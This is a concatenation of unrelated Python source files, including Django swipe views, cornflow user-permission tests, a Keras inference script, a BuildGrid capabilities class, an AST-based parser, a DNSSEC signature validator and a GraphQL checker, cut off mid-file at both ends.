logics.like_someone(user.id, sid) return render_json(data={'matched': matched}) @has_perm('superlike') def superlike(request): user = request.user sid = request.POST.get('sid') if sid is None: return render_json(code=errors.SID_ERR) sid = int(sid) matched = logics.superlike_someone(user.id, sid) return render_json(data={'matched': matched}) def dislike(request): user = request.user sid = request.POST.get('sid') if sid is None: return render_json(code=errors.SID_ERR) sid = int(sid) ret = Swiped.swipe(uid=user.id, sid=sid, mark='dislike') if ret: logics.update_swipe_score(sid, 'dislike') return render_json() @has_perm('rewind') def rewind(request): """ 反悔接口 :param request: :return: """ user = request.user logics.rewind(user) return render_json() @has_perm('liked_me') def liked_me(request): user = request.user uid_list = logics.liked_me(user) users = [u.to_dict() for u in User.objects.filter(id__in=uid_list)] return render_json(data=users) def top_rank(request): user_rank = logics.get_top_rank(10) return render_json(data=user_rank)10-100 # ---------------------------------------------------------------------- # aaa.modelprotectionprofile 
application # ---------------------------------------------------------------------- # Copyright (C) 2007-2020 The NOC Project # See LICENSE for details # ---------------------------------------------------------------------- # NOC modules from noc.lib.app.extdocapplication import ExtDocApplication, view from noc.aaa.models.modelprotectionprofile import ( ModelProtectionProfile, FieldAccess, FIELD_PERMISSIONS, ) from noc.core.translation import ugettext as _ from noc.models import get_model, is_document from noc.core.comp import smart_text IGNORED_FIELDS = {"id", "bi_id"} class ModelProtectionProfileApplication(ExtDocApplication): """ ModelProtection Profile application """ title = "ModelProtection Profile" menu = [_("Setup"), _("ModelProtection Profile")] model = ModelProtectionProfile # glyph = "key" @view(url=r"^(?P\w+\.\w+)/fields/lookup/$", method=["GET"], access="lookup", api=True) def api_model_fields_lookup(self, request, model_id): try: model = get_model(model_id=model_id) except AssertionError: return self.render_json( {"status": False, "message": "Not found model by id: %s" % model_id}, status=self.NOT_FOUND, ) # Get links if is_document(model): fields = model._fields else: fields = [f.name for f in model._meta.fields] return [{"id": name, "label": name} for name in fields if name not in IGNORED_FIELDS] def instance_to_dict(self, o, fields=None, nocustom=False): if isinstance(o, FieldAccess): return { "name": smart_text(o.name), "name__label": smart_text(o.name), "permission": o.permission, "permission__label": FIELD_PERMISSIONS[o.permission], } return super().instance_to_dict(o, fields, nocustom) baobabsoluciones/cornflow-server import json from flask_testing import TestCase from cornflow.app import create_app from cornflow.commands import AccessInitialization from cornflow.models import ( CaseModel, ExecutionModel, InstanceModel, UserModel, UserRoleModel, ) from cornflow.shared.const import ADMIN_ROLE, PLANNER_ROLE, SERVICE_ROLE, VIEWER_ROLE from cornflow.shared.utils import db from cornflow.tests.const import ( CASE_PATH, CASE_URL, EXECUTION_PATH, EXECUTION_URL_NORUN, INSTANCE_PATH, INSTANCE_URL, LOGIN_URL, SIGNUP_URL, USER_URL, ) class TestUserEndpoint(TestCase): def create_app(self): app = create_app("testing") return app def setUp(self): db.create_all() AccessInitialization().run() self.url = USER_URL self.model = UserModel self.viewer = dict( username="aViewer", email="", password="" ) self.planner = dict( username="aPlanner", email="", password="", first_name="first_planner", last_name="last_planner", ) self.planner_2 = dict( username="aSecondPlanner", email="", password="" ) self.admin = dict( username="anAdminUser", email="", password="" ) self.admin_2 = dict( username="aSecondAdmin", email="", password="" ) self.service_user = dict( username="aServiceUser", email="", password="", ) self.login_keys = ["username", "password"] self.items_to_check = ["email", "username", "id"] self.modifiable_items = [ "email", "username", "password", "first_name", "last_name", ] self.payloads = [ self.viewer, self.planner, self.planner_2, self.admin, self.admin_2, self.service_user, ] for u_data in self.payloads: response = self.client.post( SIGNUP_URL, data=json.dumps(u_data), follow_redirects=True, headers={"Content-Type": "application/json"}, ) u_data["id"] = response.json["id"] if "viewer" in u_data["email"]: user_role = UserRoleModel( {"user_id": u_data["id"], "role_id": VIEWER_ROLE} ) user_role.save() UserRoleModel.query.filter_by( user_id=u_data["id"], role_id=PLANNER_ROLE 
).delete() db.session.commit() if "admin" in u_data["email"]: user_role = UserRoleModel( {"user_id": u_data["id"], "role_id": ADMIN_ROLE} ) user_role.save() if "service_user" in u_data["email"]: user_role = UserRoleModel( {"user_id": u_data["id"], "role_id": SERVICE_ROLE} ) user_role.save() db.session.commit() def tearDown(self): db.session.remove() db.drop_all() def log_in(self, user): data = {k: user[k] for k in self.login_keys} return self.client.post( LOGIN_URL, data=json.dumps(data), follow_redirects=True, headers={"Content-Type": "application/json"}, ) def get_user(self, user_asks, user_asked=None): data = {k: user_asks[k] for k in self.login_keys} url = self.url if user_asked is not None: url += "{}/".format(user_asked["id"]) token = self.client.post( LOGIN_URL, data=json.dumps(data), follow_redirects=True, headers={"Content-Type": "application/json"}, ).json["token"] return self.client.get( url, follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) def get_non_existing_user(self): pass def make_admin(self, user_asks, user_asked, make_admin=1): token = self.log_in(user_asks).json["token"] url = "{}{}/{}/".format(self.url, user_asked["id"], make_admin) return self.client.put( url, follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) def modify_info(self, user_asks, user_asked, payload): token = self.log_in(user_asks).json["token"] url = "{}{}/".format(self.url, user_asked["id"]) return self.client.put( url, data=json.dumps(payload), follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) def delete_user(self, user_asks, user_asked): token = self.log_in(user_asks).json["token"] url = "{}{}/".format(self.url, user_asked["id"]) return self.client.delete( url, follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) def test_get_all_users_service_user(self): # the service role should not be able to get the users response = self.get_user(self.service_user) self.assertEqual(403, response.status_code) def test_get_all_users_user(self): # a simple user should not be able to do it response = self.get_user(self.planner) self.assertEqual(403, response.status_code) self.assertTrue("error" in response.json) def test_get_all_users_admin(self): # An admin should be able to get all users response = self.get_user(self.admin) self.assertEqual(200, response.status_code) self.assertEqual(len(response.json), len(self.payloads)) def test_get_same_user(self): # if a user asks for itself: it's ok for u_data in [self.planner, self.admin, self.service_user]: response = self.get_user(u_data, u_data) self.assertEqual(200, response.status_code) for item in self.items_to_check: self.assertEqual(response.json[item], u_data[item]) def test_get_another_user(self): response = self.get_user(self.planner, self.admin) self.assertEqual(400, response.status_code) self.assertTrue("error" in response.json) def test_get_another_user_admin(self): response = self.get_user(self.admin, self.planner) self.assertEqual(200, response.status_code) for item in self.items_to_check: self.assertEqual(response.json[item], self.planner[item]) def test_user_makes_someone_admin(self): response = self.make_admin(self.planner, self.planner) self.assertEqual(403, response.status_code) def test_service_user_makes_someone_admin(self): response = self.make_admin(self.service_user, self.planner) self.assertEqual(403, 
response.status_code) def test_admin_makes_someone_admin(self): response = self.make_admin(self.admin, self.planner) self.assertEqual(200, response.status_code) self.assertEqual(True, UserRoleModel.is_admin(self.planner["id"])) def test_admin_takes_someone_admin(self): response = self.make_admin(self.admin, self.admin_2, 0) self.assertEqual(200, response.status_code) self.assertEqual(False, UserRoleModel.is_admin(self.planner["id"])) def test_user_deletes_admin(self): response = self.delete_user(self.planner, self.admin) self.assertEqual(403, response.status_code) def test_admin_deletes_service_user(self): response = self.delete_user(self.admin, self.service_user) self.assertEqual(403, response.status_code) def test_admin_deletes_user(self): response = self.delete_user(self.admin, self.planner) self.assertEqual(200, response.status_code) response = self.get_user(self.admin, self.planner) self.assertEqual(404, response.status_code) def test_service_user_deletes_admin(self): response = self.delete_user(self.service_user, self.admin) self.assertEqual(403, response.status_code) def test_edit_info(self): payload = { "username": "newtestname", "email": "", "first_name": "FirstName", "last_name": "LastName", } response = self.modify_info(self.planner, self.planner, payload) self.assertEqual(200, response.status_code) for item in self.modifiable_items: if item != "password": self.assertEqual(response.json[item], payload[item]) self.assertNotEqual(response.json[item], self.planner[item]) def test_admin_edit_info(self): payload = { "username": "newtestname", "email": "", "first_name": "FirstName", "last_name": "LastName", } response = self.modify_info(self.admin, self.planner, payload) self.assertEqual(200, response.status_code) for item in self.modifiable_items: if item != "password": self.assertEqual(response.json[item], payload[item]) self.assertNotEqual(response.json[item], self.planner[item]) def test_edit_other_user_info(self): payload = {"username": "newtestname", "email": ""} response = self.modify_info(self.planner_2, self.planner, payload) self.assertEqual(403, response.status_code) def test_change_password(self): payload = {"password": ""} response = self.modify_info(self.planner, self.planner, payload) self.assertEqual(200, response.status_code) self.planner["password"] = payload["password"] response = self.log_in(self.planner) self.assertEqual(200, response.status_code) self.assertIsNotNone(response.json["token"]) def test_change_other_user_password(self): payload = {"password": ""} response = self.modify_info(self.planner_2, self.planner, payload) self.assertEqual(403, response.status_code) def test_admin_change_password(self): payload = {"password": ""} response = self.modify_info(self.admin, self.planner, payload) self.assertEqual(200, response.status_code) self.planner["password"] = payload["password"] response = self.log_in(self.planner) self.assertEqual(200, response.status_code) self.assertIsNotNone(response.json["token"]) def test_service_user_change_password(self): payload = {"password": ""} response = self.modify_info(self.service_user, self.planner, payload) self.assertEqual(403, response.status_code) def test_viewer_user_change_password(self): payload = {"password": ""} response = self.modify_info(self.viewer, self.viewer, payload) self.assertEqual(200, response.status_code) self.viewer["password"] = payload["password"] response = self.log_in(self.viewer) self.assertEqual(200, response.status_code) self.assertIsNotNone(response.json["token"]) class TestUserModel(TestCase): 
def create_app(self): app = create_app("testing") return app def setUp(self): db.create_all() AccessInitialization().run() self.url = USER_URL self.model = UserModel self.admin = dict( username="anAdminUser", email="", password="" ) response = self.client.post( SIGNUP_URL, data=json.dumps(self.admin), follow_redirects=True, headers={"Content-Type": "application/json"}, ) self.admin["id"] = response.json["id"] user_role = UserRoleModel({"user_id": self.admin["id"], "role_id": ADMIN_ROLE}) user_role.save() db.session.commit() self.login_keys = ["username", "password"] self.viewer = dict( username="aViewer", email="", password="" ) response = self.client.post( SIGNUP_URL, data=json.dumps(self.viewer), follow_redirects=True, headers={"Content-Type": "application/json"}, ) self.viewer["id"] = response.json["id"] def tearDown(self): db.session.remove() db.drop_all() def log_in(self, user): data = {k: user[k] for k in self.login_keys} return self.client.post( LOGIN_URL, data=json.dumps(data), follow_redirects=True, headers={"Content-Type": "application/json"}, ) def test_instance_delete_cascade(self): response = self.log_in(self.admin) token = response.json["token"] user_id = response.json["id"] with open(INSTANCE_PATH) as f: payload = json.load(f) response = self.client.post( INSTANCE_URL, data=json.dumps(payload), follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) self.assertEqual(201, response.status_code) instance_id = response.json["id"] response = self.client.delete( self.url + str(user_id) + "/", follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) self.assertEqual(200, response.status_code) instance = InstanceModel.query.get(instance_id) self.assertIsNone(instance) def test_instance_execution_delete_cascade(self): response = self.log_in(self.admin) token = response.json["token"] user_id = response.json["id"] with open(INSTANCE_PATH) as f: payload = json.load(f) response = self.client.post( INSTANCE_URL, data=json.dumps(payload), follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) self.assertEqual(201, response.status_code) instance_id = response.json["id"] with open(EXECUTION_PATH) as f: payload = json.load(f) payload["instance_id"] = instance_id response = self.client.post( EXECUTION_URL_NORUN, data=json.dumps(payload), follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) self.assertEqual(201, response.status_code) execution_id = response.json["id"] response = self.client.delete( self.url + str(user_id) + "/", follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) self.assertEqual(200, response.status_code) instance = InstanceModel.query.get(instance_id) execution = ExecutionModel.query.get(execution_id) self.assertIsNone(instance) self.assertIsNone(execution) def test_case_delete_cascade(self): response = self.log_in(self.admin) token = response.json["token"] user_id = response.json["id"] with open(CASE_PATH) as f: payload = json.load(f) response = self.client.post( CASE_URL, data=json.dumps(payload), follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) self.assertEqual(201, response.status_code) case_id = response.json["id"] response = self.client.delete( self.url + str(user_id) + "/", follow_redirects=True, headers={ "Content-Type": 
"application/json", "Authorization": "Bearer " + token, }, ) self.assertEqual(200, response.status_code) case = CaseModel.query.get(case_id) self.assertIsNone(case) def test_user_role_delete_cascade(self): response = self.log_in(self.admin) token = response.json["token"] user_id = response.json["id"] user_role = UserRoleModel.query.filter_by(user_id=user_id).first() self.assertIsNotNone(user_role) response = self.client.delete( self.url + str(user_id) + "/", follow_redirects=True, headers={ "Content-Type": "application/json", "Authorization": "Bearer " + token, }, ) self.assertEqual(200, response.status_code) user_role = UserRoleModel.query.filter_by(user_id=user_id).first() self.assertIsNone(user_role) def test_user_roles(self): response = self.log_in(self.admin) user_id = response.json["id"] user = UserModel.query.get(user_id) self.assertEqual(user.roles, {2: "planner", 3: "admin"}) def test_user_no_roles(self): role = UserRoleModel.query.filter_by(user_id=self.viewer["id"]).delete() user = UserModel.query.get(self.viewer["id"]) self.assertEqual(user.roles, {}) 310652027/VRDL_HW1inference.py from keras.models import load_model from keras.models import Sequential test_path='?' #可在此輸入test_image路徑 out_path='?' #可在此輸入輸出路徑 model = Sequential() model = load_model('filepath+model-resnet50-final.h5') train = pd.read_csv('training_labels.txt', sep=" ", header=None) train.columns = ["id", "label"] y = train['label'].values integer_mapping = {x: i for i,x in enumerate(y)} vec = [integer_mapping[word] for word in y] y = np.array(y) label_encoder = LabelEncoder() vec = label_encoder.fit_transform(y) y = to_categorical(vec) ''' 抱歉以上這邊做得不夠好,當初在colab時並沒有做出另外一個檔案 來讀取model,所以這邊的y是原本讀取標籤內容所做的編號, 現在也需要用y的編號來重新輸出回新的txt內 ''' test = pd.read_csv('testing_img_order.txt', header=None) test.columns = ["id"] test_image = [] for i in tqdm(range(test.shape[0])): img = image.load_img(str(test_path) + str(test['id'][i]), target_size=(200,200,3)) #224 img = image.img_to_array(img) img = img/255 test_image.append(img) test = np.array(test_image) predict = model.predict(test) classes_x = np.argmax(predict,axis=1) vec = label_encoder.inverse_transform(classes_x) test = pd.read_csv('testing_img_order.txt', header=None) test.columns = ["id"] test['label'] = '' for i in tqdm(range(test.shape[0])): #test['label'][i] = int(classes_x[i]) test['label'][i] = vec[i] test.to_csv(out_path+'answer-max.txt', sep=" " ,header=None, index=None) from enum import Enum class UserType(Enum): CUSTOMER = 1 EMPLOYEE = 2 UNDEFINED = 3 def __str__(self): return "{}".format(self.name.upper()) # Copyright (C) 2018 Bloomberg LP # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
import logging from buildgrid._protos.build.bazel.remote.execution.v2 import remote_execution_pb2 from buildgrid._protos.build.bazel.semver import semver_pb2 from buildgrid.settings import HIGH_REAPI_VERSION, LOW_REAPI_VERSION class CapabilitiesInstance: def __init__(self, cas_instance=None, action_cache_instance=None, execution_instance=None): self.__logger = logging.getLogger(__name__) self._instance_name = None self.__cas_instance = cas_instance self.__action_cache_instance = action_cache_instance self.__execution_instance = execution_instance self.__high_api_version = None self.__low_api_version = None # --- Public API --- @property def instance_name(self): return self._instance_name def register_instance_with_server(self, instance_name, server): """Names and registers the capabilities instance with a given server.""" if self._instance_name is None: server.add_capabilities_instance(self, instance_name) self._instance_name = instance_name else: raise AssertionError("Instance already registered") def add_cas_instance(self, cas_instance): self.__cas_instance = cas_instance def add_action_cache_instance(self, action_cache_instance): self.__action_cache_instance = action_cache_instance def add_execution_instance(self, execution_instance): self.__execution_instance = execution_instance def get_capabilities(self): cache_capabilities = self._get_cache_capabilities() execution_capabilities = self._get_capabilities_execution() if self.__high_api_version is None: self.__high_api_version = self._split_semantic_version(HIGH_REAPI_VERSION) if self.__low_api_version is None: self.__low_api_version = self._split_semantic_version(LOW_REAPI_VERSION) server_capabilities = remote_execution_pb2.ServerCapabilities() server_capabilities.cache_capabilities.CopyFrom(cache_capabilities) server_capabilities.execution_capabilities.CopyFrom(execution_capabilities) server_capabilities.low_api_version.CopyFrom(self.__low_api_version) server_capabilities.high_api_version.CopyFrom(self.__high_api_version) return server_capabilities # --- Private API --- def _get_cache_capabilities(self): capabilities = remote_execution_pb2.CacheCapabilities() action_cache_update_capabilities = remote_execution_pb2.ActionCacheUpdateCapabilities() if self.__cas_instance: capabilities.digest_function.extend([self.__cas_instance.hash_type()]) capabilities.max_batch_total_size_bytes = self.__cas_instance.max_batch_total_size_bytes() capabilities.symlink_absolute_path_strategy = self.__cas_instance.symlink_absolute_path_strategy() # TODO: execution priority #102 # capabilities.cache_priority_capabilities = if self.__action_cache_instance: capabilities.digest_function.extend([self.__action_cache_instance.hash_type()]) action_cache_update_capabilities.update_enabled = self.__action_cache_instance.allow_updates capabilities.action_cache_update_capabilities.CopyFrom(action_cache_update_capabilities) return capabilities def _get_capabilities_execution(self): capabilities = remote_execution_pb2.ExecutionCapabilities() if self.__execution_instance: capabilities.exec_enabled = True capabilities.digest_function = self.__execution_instance.hash_type() # TODO: execution priority #102 # capabilities.execution_priority = else: capabilities.exec_enabled = False return capabilities def _split_semantic_version(self, version_string): major_version, minor_version, patch_version = version_string.split('.') semantic_version = semver_pb2.SemVer() semantic_version.major = int(major_version) semantic_version.minor = int(minor_version) semantic_version.patch = 
int(patch_version) return semantic_version 1-10 # (C) Copyright 2005-2021 Enthought, Inc., Austin, TX # All rights reserved. # # This software is provided without warranty under the terms of the BSD # license included in LICENSE.txt and may be redistributed only under # the conditions described in the aforementioned license. The license # is also available online at http://www.enthought.com/licenses/BSD.txt # # Thanks for using Enthought open source! import abc class INotifier(abc.ABC): """ Interface for all notifiers. An instance of notifier must be a callable, i.e. ``__call__`` must be implemented and cannot be None. The signature of that callable should be compatible with the observables the notifier will be given to. This interface does not define what that signature should be. """ def __call__(self, *args, **kwargs): """ Called by an observable. The signature is not restricted by the interface. """ raise NotImplementedError("__call__ must be implemented.") def add_to(self, observable): """ Add this notifier to the observable. Parameters ---------- observable : IObservable """ raise NotImplementedError("add_to must be implemented.") def remove_from(self, observable): """ Remove this notifier or a notifier equivalent to this one from the observable. Parameters ---------- observable : IObservable Raises ------ NotifierNotFound If the notifier cannot be found. """ raise NotImplementedError("remove_from must be implemented.") #!/usr/bin/env python # -*- coding: utf-8 -*- import numpy as np from graphdot.codegen.cpptool import cpptype from ._base import MicroKernel def DotProduct(): r"""Creates a dot product microkernel, which computes the inner product between two vector-valued features. Parameters ---------- This kernel does not have any tunable hyperparameters. 
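Examples
--------
Illustrative sketch, not part of the original docstring; it only relies on the
``__call__`` behaviour shown below::

    import numpy as np
    k = DotProduct()
    value = k(np.array([1.0, 2.0]), np.array([3.0, 4.0]))                      # inner product -> 11.0
    value, jacobian = k(np.array([1.0, 2.0]), np.array([3.0, 4.0]), jac=True)  # jacobian == [] (no hyperparameters)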
""" @cpptype([]) class DotProductKernel(MicroKernel): @property def name(self): return 'DotProduct' def __call__(self, X, Y, jac=False): X = np.asarray(X) Y = np.asarray(Y) if jac is True: return X @ Y, [] else: return X @ Y def __repr__(self): return f'{self.name}()' def gen_expr(self, x, y, theta_scope=''): return f'dotproduct({x}, {y})', [] @property def theta(self): return tuple() @theta.setter def theta(self, seq): pass @property def bounds(self): return tuple() @property def minmax(self): return (0, np.inf) return DotProductKernel() mbits-os/JiraDesktopbuild/win32/mui.rc.py0 import sys, langs as lng, strings with open(sys.argv[1], "rb") as infile: text = "".join([x.decode('utf-8') for x in infile]) toks = text.split("$(") prog = [(None, toks[0])] toks = toks[1:] names = {} for tok in toks: name, text = tok.split(')', 1) prog.append((name, text)) names[name] = "" full_lang = (int(sys.argv[5]) << 10) | int(sys.argv[4]) names["CODEPAGE"] = sys.argv[6] names["SUBLANG_ID"] = sys.argv[5] names["LANG_ID"] = sys.argv[4] names["LANG_HEX"] = hex(full_lang).split("0x", 1)[1] while len(names["LANG_HEX"]) < 4: names["LANG_HEX"] = "0" + names["LANG_HEX"] tr = strings.open(sys.argv[3]) app_name = tr.get(lng.LNG_APP_NAME) infotip = '"%s"' % tr.get(lng.LNG_APP_INFOTIP).replace('"', '""').replace("%1", app_name).replace("%2", '" PROGRAM_VERSION_STRING PROGRAM_VERSION_STABILITY "') names["LNG_APP_DESCRIPTION"] = '"%s"' % tr.get(lng.LNG_APP_DESCRIPTION).replace('"', '""') names["LNG_APP_LINK_INFOTIP"] = infotip.replace('%3"', '" VERSION_STRINGIFY(PROGRAM_VERSION_BUILD)').replace("%3", '" VERSION_STRINGIFY(PROGRAM_VERSION_BUILD) "') names["LNG_APP_NAME"] = '"%s"' % app_name.replace('"', '""') with open(sys.argv[2], "wb") as out: for p in prog: if p[0] is not None: out.write(names[p[0]].encode('utf-8')) out.write(p[1].encode('utf-8')) # Generated with SMOP 0.41 # main.m #African Vulture Optimization alghorithm # Read the following publication first and cite if you use it # @article{abdollahzadeh2021african, # title={African Vultures Optimization Algorithm: A New Nature-Inspired Metaheuristic Algorithm for Global Optimization Problems}, # author={ Gharehchopogh, }, # journal={Computers \& Industrial Engineering}, # pages={107408}, # year={2021}, # publisher={Elsevier}, # url = {https://www.sciencedirect.com/science/article/pii/S0360835221003120} # } from ObjectiveFunction import ObjectiveFunction from AVOA import AVOA from matplotlib.pyplot import * from numpy import * # Population size and stoppoing condition pop_size=30 # main.m:21 max_iter=100 # main.m:22 # Define your objective function's details here fobj=ObjectiveFunction # main.m:25 variables_no=2 # main.m:26 lower_bound=[-10 for i in range(variables_no)] # main.m:27 upper_bound=[10 for i in range(variables_no)] # main.m:28 Best_vulture1_F,Best_vulture1_X,convergence_curve=AVOA(pop_size,max_iter,lower_bound,upper_bound,variables_no,fobj,nargout=3) print('best_y=',Best_vulture1_F) print('best_x=',Best_vulture1_X) iters = [it for it in range(max_iter)] plot(iters, convergence_curve) show() # main.m:30 #figure # Best optimal values for the decision variables #subplot(1,2,1) #parallelcoords(Best_vulture1_X) #xlabel('Decision variables') #ylabel('Best estimated values ') #box('on') # Best convergence curve #subplot(1,2,2) #plot(convergence_curve) #title('Convergence curve of AVOA') #xlabel('Current_iteration') #ylabel('Objective value') #box('on') src/parse.py # Uzh # Author: import ast from .tools import error, type_name from .term import * OPERATORS = 
dict( And="&&", Or="||", Add="+", Sub="-", Mult="*", LShift="<<", RShift=">>", BitOr="|", BitXor="^", BitAnd="&", Invert="~", Not="!", USub="-", Eq="==", NotEq="!=", Lt="<", LtE="<=", Gt=">", GtE="<=" ) def ast_error(t): pos = ", line %s" % t.lineno if hasattr(t, "lineno") else "" error(("unsupported AST node '%s'" + pos) % type_name(t)) def make_parser(c): MOD_G = dict(host=lambda f: f) many = lambda t: [parse_ast(x) for x in t] def compare(t): if len(t.ops) == 1 and len(t.comparators) == 1: return BinOp( parse_op(t.ops[0]), parse_ast(t.left), parse_ast(t.comparators[0]), line=t.lineno ) ast_error(t) def bool_op(t): op, r = parse_op(t.op), parse_ast(t.values[0]) for v in t.values[1:]: r = BinOp(op, r, parse_ast(v), line=t.lineno) return r def subscript(t): if isinstance(t.slice, ast.Index): return Index(parse_ast(t.value), parse_ast(t.slice.value), line=t.lineno) ast_error(t) def assign(t): if len(t.targets) == 1 and \ isinstance(t.targets[0], (ast.Name, ast.Subscript)): return Assign(parse_ast(t.targets[0]), parse_ast(t.value), line=t.lineno) ast_error(t) def aug_assign(t): target = parse_ast(t.target) return Assign( target, BinOp(parse_op(t.op), target, parse_ast(t.value), line=t.lineno), line=t.lineno ) def while_stmt(t): if not t.orelse: return While(parse_ast(t.test), many(t.body), line=t.lineno) ast_error(t) def for_stmt(t): if not t.orelse: return For( parse_ast(t.target), parse_ast(t.iter), many(t.body), line=t.lineno ) ast_error(t) def is_macro(n): return n in c.macros and c.macros[n]["val"][0] == "macro" def eval_args(args): return [eval(compile(ast.Expression(body=x), c.filename, "eval"), MOD_G) for x in args] def call_macro(t): if isinstance(t.func, ast.Name) and is_macro(t.func.id): return c.macros[t.func.id]["func"](c, *eval_args(t.args)) return Call(parse_ast(t.func), many(t.args), line=t.lineno) def parse_op(t): n = type_name(t) if n in OPERATORS: return OPERATORS[n] ast_error(t) def parse_ast(t): n = type_name(t) if n in AST: return AST[n](t) ast_error(t) AST = dict( Name=lambda t: Id(t.id, line=t.lineno), Num=lambda t: Int(int(t.n), line=t.lineno), NameConstant=lambda t: Int(1 if t.value else 0, line=t.lineno), BinOp=lambda t: BinOp( parse_op(t.op), parse_ast(t.left), parse_ast(t.right), line=t.lineno ), UnaryOp=lambda t: UnOp( parse_op(t.op), parse_ast(t.operand), line=t.lineno ), Expr=lambda t: parse_ast(t.value), Call=call_macro, Return=lambda t: Return( parse_ast(t.value) if t.value else None, line=t.lineno ), If=lambda t: If( parse_ast(t.test), many(t.body), many(t.orelse), line=t.lineno ), Compare=compare, BoolOp=bool_op, Subscript=subscript, Assign=assign, AugAssign=aug_assign, While=while_stmt, For=for_stmt, Pass=lambda t: Nop(line=t.lineno) ) def parse_elem(x): if isinstance(x, (int, float)): return int(x) error("unsupported data type %s" % type(x)) def parse_data(data): if isinstance(data, list): return Array([parse_elem(x) for x in data]) return Const(parse_elem(data)) def make_var(t): n = t.targets[0].id val = parse_data(MOD_G[n]) return dict( name=n, val=val, offs=None ) def make_func(t): val = Func([x.arg for x in t.args.args], many(t.body), line=t.lineno) return dict( name=t.name, val=val, offs=None, args=len(val[1]), locs=dict([(v, i) for i, v in enumerate(val[1])]), ret=None ) def parse_module(body): g = {} for t in body: exec(compile(ast.Module(body=[t]), c.filename, "exec"), MOD_G) if isinstance(t, ast.Assign) and len(t.targets) == 1: if isinstance(t.targets[0], ast.Name): g[t.targets[0].id] = make_var(t) elif isinstance(t, ast.FunctionDef) and not 
t.decorator_list: g[t.name] = make_func(t) return g return lambda: parse_module(ast.parse(c.source, filename=c.filename).body) ma = y.rolling(4).mean() ax = ma.plot(legend=True, label="MA[4]", figsize=(12, 4)) y.plot(ax=ax, label="Observed", legend=True);"""Get information about all devices on your network.""" from googledevices.helpers import gdh_session, gdh_sleep from googledevices.utils.convert import format_json def get_all_devices(loop, subnet): """Get information about all devices on your network.""" from googledevices.api.cast.bluetooth import Bluetooth from googledevices.utils.scan import NetworkScan from googledevices.api.cast.info import Info devices = {} async def get_device_info(host): """Grab device information.""" async with gdh_session() as session: googledevices = Info(host.get("host"), loop, session) await googledevices.get_device_info() ghname = googledevices.device_info.get("name") async with gdh_session() as session: googledevices = Bluetooth(host.get("host"), loop, session) await googledevices.scan_for_devices() await gdh_sleep() await googledevices.get_scan_result() for device in googledevices.devices: mac = device["mac_address"] if not devices.get(mac, False): # New device devices[mac] = {} devices[mac]["rssi"] = device.get("rssi") devices[mac]["ghunit"] = ghname elif devices[mac].get("rssi") < device.get("rssi"): # Better RSSI value on this device devices[mac]["rssi"] = device.get("rssi") devices[mac]["ghunit"] = ghname async def bluetooth_scan(): """Get devices from all GH units on the network.""" if not subnet: import netifaces gateway = netifaces.gateways().get("default", {}) ipscope = gateway.get(netifaces.AF_INET, ())[0][:-1] + "0/24" else: ipscope = subnet async with gdh_session() as session: googledevices = NetworkScan(loop, session) result = await googledevices.scan_for_units(ipscope) for host in result: if host["bluetooth"]: await get_device_info(host) print(format_json(devices)) loop.run_until_complete(bluetooth_scan()) nivelator_course/add_integer_numbers.py # Asking for the numbers number1 = int(input("Enter the first number: ")) # Asking for the second number number2 = int(input("Enter the second number: ")) # Adding the two numbers and printing the result on screen result = str(number1 + number2) print("The result of the sum is: " + result)roeckelein/sprocket ''' rrsig_missing - RRSet test: RrsigMissing .. Copyright (c) 2015 Neustar, Inc. All rights reserved. .. See COPYRIGHT.txt for full notice. See LICENSE.txt for terms and conditions. ''' import time import dns.rdatatype import dns.rdtypes.ANY.RRSIG import dns.dnssec import dns_sprockets_lib.validators as validators class RrsigMissing(validators.RRSetTest): # pylint: disable=too-few-public-methods ''' Checks that all (non-RRSIG, non-delegated) RRSets are covered with an RRSIG. ''' TEST_DNSSECTYPE = True TEST_OPTARGS = { 'now': (None, 'Time to use for validating RRSIG time windows, e.g. 20150101123000'), 'now_offset': (None, 'Number of seconds to offset the "now" value, e.g. 
-86400)')} def __init__(self, args): self.now = None self.now_offset = None super(RrsigMissing, self).__init__(args) self.posix_now = (self.now and dns.rdtypes.ANY.RRSIG.sigtime_to_posixtime(self.now) or int(time.time())) if self.now_offset: self.posix_now += int(self.now_offset) def run(self, context, suggested_tested, name, rdataset): tested = None result = None # Only do this test for non-RRSIG, non-delegated RRSets: if (rdataset.rdtype != dns.rdatatype.RRSIG and not context.is_delegated(name)): tested = suggested_tested # Make sure there's a valid RRSIG for the rdataset: rrsigset = context.zone_obj.get_rdataset( name, 'RRSIG', covers=rdataset.rdtype) if not rrsigset: result = 'No RRSIG for name: %s' % (name) else: # Use dnspython's RRSIG validator: try: dns.dnssec.validate( (name, rdataset), (name, rrsigset), {context.zone_name: context.dnskey_rdataset}, now=self.posix_now) except dns.dnssec.UnsupportedAlgorithm as err: result = str(err) except dns.dnssec.ValidationFailure as err: result = str(err) return (tested, result) # end of file kyaaqba/magma #!/usr/bin/env python3 import ast import json import pycodestyle from gql_checker.__about__ import ( __author__, __copyright__, __email__, __license__, __summary__, __title__, __uri__, __version__, ) from graphql import Source, build_client_schema, parse, validate __all__ = [ "__title__", "__summary__", "__uri__", "__version__", "__author__", "__email__", "__license__", "__copyright__", ] GQL_SYNTAX_ERROR = "GQL100" GQL_VALIDATION_ERROR = "GQL101" class ImportVisitor(ast.NodeVisitor): """ This class visits all the gql calls. """ def __init__(self, filename, options): self.filename = filename self.options = options or {} self.calls = [] def visit_Call(self, node): # noqa if node.func.id == "gql": self.calls.append(node) def node_query(self, node): """ Return the query for the gql call node """ if isinstance(node, ast.Call): assert node.args arg = node.args[0] if not isinstance(arg, ast.Str): return else: raise 